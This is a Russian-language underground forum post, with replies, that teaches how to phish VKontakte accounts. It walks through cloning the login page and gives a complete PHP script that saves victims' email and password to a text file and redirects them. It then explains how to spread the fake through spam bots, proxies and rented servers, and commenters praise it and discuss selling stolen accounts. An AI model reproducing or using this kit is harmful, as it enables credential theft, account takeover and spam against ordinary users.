Фишинг- это получение аккаунтов путем обмана, с помощью формочки куда нужно ввести логин/пароль. Я позволю себе очень вольное определение фишинга, поскольку тут буду затрагивать довольно узкий круг вопросов касающийся социальной сети Вконтакте.=) Фишера должны волновать несколько вопросов: 1. Какой фейк он будет использовать фейки бывают программные, а бывают web. Программный фейк- это программа, которая предлагает пользователю некую ХАЛЯВУ (запомните, 2 основных союзника фишера- это глупость и жадность) Для создания программного фейка требуется знание Delphi. Или немного денег, для покупки готового в соседнем разделе. 2. web фейк- это копия сайта, пользователей которого собираются ломать. Здесь я кратко опишу процесс изготовления фейка Vk, самого простого, любезно описанный в свое время shram'om: 1. Воспользуемся браузером Опера. Зайдем на главную страничку ВК, жмем "Вход" попадаем на логин.пхп, ее возьмем за индекс нашего фейка. Жмем в опере: Фаил--->Сохранить как----> В открывшемся диалоге выбираем HTML Фаил с изображениями---->Имя Файла пишем "index.htm" 2. Забьем вместо лигина/пароля: 1/0 Попадаем на страничку с надписью: "Такой почтовый адрес не зарегистрирован, либо пароль неверный" Сохраняем ее точно так же, только называем bad.htm 3. Вбиваем в Google.ru фразу Vkontakte.ru---> жмем дополнительные результаты с vkontakte.ru ---> надо найти что-то связанное с eror вконтакте---> например что-то такое http://vkontakte.ru/blank.php?code=10 (эта ссылка нам еще пригодится) 4.Теперь иследуем форму логина. Открываем наш index.html и ищем форму входа, нам потребуются три строчки <form method="post" name="login" id="login" action="/login.php"> <input class="inputText" onfocus="show('expirePad');" type="text" name="email" id="email" size="20" /> <input class="inputText" onfocus="show('expirePad');" type="password" name="pass" id="pass" size="20" style="margin-bottom: 2px" /> Будем считать, что изучили создаем php файл, и называем его к примеру login.php: <?php /* ############# #by_NoNameZ# ########### */ $f=fopen("fuck.txt","at"); flock($f,2); if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['login'])&& !empty($_POST['password'])){ fputs($f, $_POST['email'].";".$_POST['pass']." \n"); header("Location: http://vkontakte.ru/blank.php?code=10"); } else { header("Location: bad.htm"); } flock($f,3); fclose($f); ?> Строго говоря- это "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i" рассчитано только на пользователь у которых мыло,а не логин, но таких абсолютное большинство. И она поможет вам избавиться от части мусора. Сохраняем. Заливаем на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами) создаем файил log.txt, туда будут идти данные жертв. Web фейк хорош тем, что данные жертв сразу в виде login;password и вам не надо их парсить руками как в программном. Теперь вам надо как-то впарить свой шедевр, для этого вам идеально подойдут программы для спама. типа vkbot, Yet Another Vkontakte Sender v2 итд итп=) Их можно найти в паблике. Написать закажигательный текст о халве "Налетай, торопись, закачай, оголосись" и рассылать например по стенам групп или по личкам пользователей. Тут я позволю себе написать краткий мануал, по распространению: 1) Берем любую рабочую прогу способную слать, спам, в лички, стены груп, стены пользователей, все, что угодно, хорошо если она поддерживает прокси. http://vkgroup.ucoz.ru/ отсюда скачать проксифайндер, он крякнутый и любой чекер для прокси например diCheker Gриобрести себе дедик есть врианты даже за 1$ (см поиск по Ачату) 2) находишь прокси проксифайндером, чекаешь, находишь одну валидную как можно более быструю, используешь, если это предусмотрено в софте, так продливается жизнь дедика, ip позже. 3) Рассылаешь спам в стиле: "халявный рейтинг тут! <ccылка>" <ссылка> на ваш веб фейк или залитый файл. Заключение: Не стать жертвой фейка просто- бесплатный сыр бывает только в мышеловке, никогда не вводите свои log;pass где попало, а вот жертвой брута может стать уже и более осторожный человек. но тут главное не использовать пароль типа этих: 123456 123456789 qwerty 111111 1234567890 7777777 123321 666666 1234567 123123 12345678 qwertyuiop qazwsxedc 000000 любовь 555555 zxcvbnm 654321 gfhjkm 1q2w3e4r Cамые популярные p.s. Это моя первая статья, не судите строго. Если кто оценит- мне будет очень приятно. Любую критику восприму адекватно. При подготовке к статье использовались материалы: 1. опубликованный shram'om скрипт by_NoNameZ ТС всегда рад "+", спс, Yettisports
1. Я ничего приватного тут не раскрыл, просто изложил общую методику. =) 2. Мне сейчас некогда заниматься еще и рыбалкой=) Попытался собрать артель, но все потонули=) Поэтому признаюсь честно в общем и целом, я за падение цен на акки. Тем более, что благодаря тому, что авм оставило 1 ip, а в контакте снова наступают перемены, цены на софт и прокси несколько ограничивают инвайтинг от совсем случайных людей.
Ребята кто знает подскажите как обойти фишинг сайта ( фейка ) мозиллой ... Капец сил нету уже бороться с этой заразой !
Vegorovi4, зайдите сюда - C:\WINDOWS\system32\drivers\etc После откройте блокнотом файл hosts и удали те все что там есть. Напишите 127.0.0.1 localhost. Все! Если оно, то все разрешится.
megalodon, спасибо за статью! Мне очень понравилось, еще хотелось бы, чтобы ты ее дополнял, например периодически обновлял ссылки на полезные статьи, указывал бы ссылки на дополнительный софт и т.д. и т.п.
megalodon, спасибо за то, что не поленился написать статью. для большинства она окажется интересной. но неужели все так плохо? возьми калькулятор в руки: 1. выведи чистую прибыль за неделю/месяц, отдельно учитывая графу расходников "акки". 2. теперь посчитай сколько ты зарабатываешь на 1 купленном аккаунте. 3. хочешь акки дешевле? ок, допустим ты покупал по рублю, а будешь брать по 50коп. в заключении сравни цифру "2" с тем, что ты экономишь на одном купленном акке. каково соотношение? по прежнему хочешь акки дешевле?
